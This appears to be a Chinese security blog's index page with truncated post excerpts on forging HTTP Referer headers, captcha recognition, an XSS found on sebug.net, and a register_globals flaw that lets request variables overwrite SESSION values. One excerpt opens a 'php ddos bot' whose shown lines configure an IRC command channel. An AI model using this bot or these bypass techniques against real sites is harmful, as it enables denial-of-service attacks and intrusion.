HTTP-REFERER这个变量已经越来越不可靠了，完全就是可以伪造出来的东东。

原理都是sock构造http头来senddata。其他语言什么的比如perl也可以,

目前比较简单的防御伪造referer的方法是用验证码（Session）。

现在有一些能防盗链软件的商业公司比如UUDOG，linkgate，VirtualWall什么的，都是开发的应用于IIS上面的dll。
有的是采用cookies验证、线程控制，有的是能随机生成文件名然后做URL重写。有的方法能的确达到不错的效果.

不过道高一尺，魔高一丈，这些雕虫小技终归是有破解方法的。

» 阅读全文

/*
php ddos bot
Version 1.0
*/
$server="1.3.3.7";
$Port="6667";
$nick="bot-";$willekeurig;
$willekeurig=mt_rand(0,3);
$nicknummer=mt_rand(100000,999999);
$Channel="#WauShare";
$Channelpass="ddos"

» 阅读全文

microsoft开始大力支持php了，zend公司和微软公司改善了微软的IIS Web服务器的fastcgi模块，它将提高PHP的性能。这个模块免费提供给IIS6和IIS7的用户，可以运行在Windows Server 2003上，并将作为vista和即将推出的Windows Server 2008的一部分。

近日，微软和PHP社区经过一年的努力，通过fastcgi扩展，终于能让PHP在IIS 7.0上执行效率大增。而此前，PHP曾经是IIS心口上的稳痛，PHP在IIS的扩展速度一直跟不上其他服务端。而免费的FastCGI扩展的出现，使得PHP一越成为Windows平台之上的“一等公民”。

更详细的信息在这里：http://www.phpq.net/viewnews-15.html

再来来,无意间发现sebug.net的一个xss,

$php_SELF=$_SERVER['php_SELF'];

amxku PS:一个是7j写的,一个是国外的,相比之下,国外的那个东,速度要快一些,7J可能该郁闷了。呵呵，学习学习。

» 阅读全文

56验证码
包含排干扰的算法

PS : 点阵写得很完美的东东,好好学学。

前几天为sebug.net 写的一个JS  。

没有什么技术,共享之。有不妥之处还望斧正。

amxku_at_msn.com

» 阅读全文

register_globals 为 On 的时候，
用import_request_variables('G')和extract($_GET)创建的变量是不会改变SESSION的。

总结：漏洞只存在于php配置register_globals = On的时候，定义的变量会改变同名的SESSION。

作者：Cos.X

amxku:好像是可以利用的，前几天见有人利用过。有时间测试测试。

» 阅读全文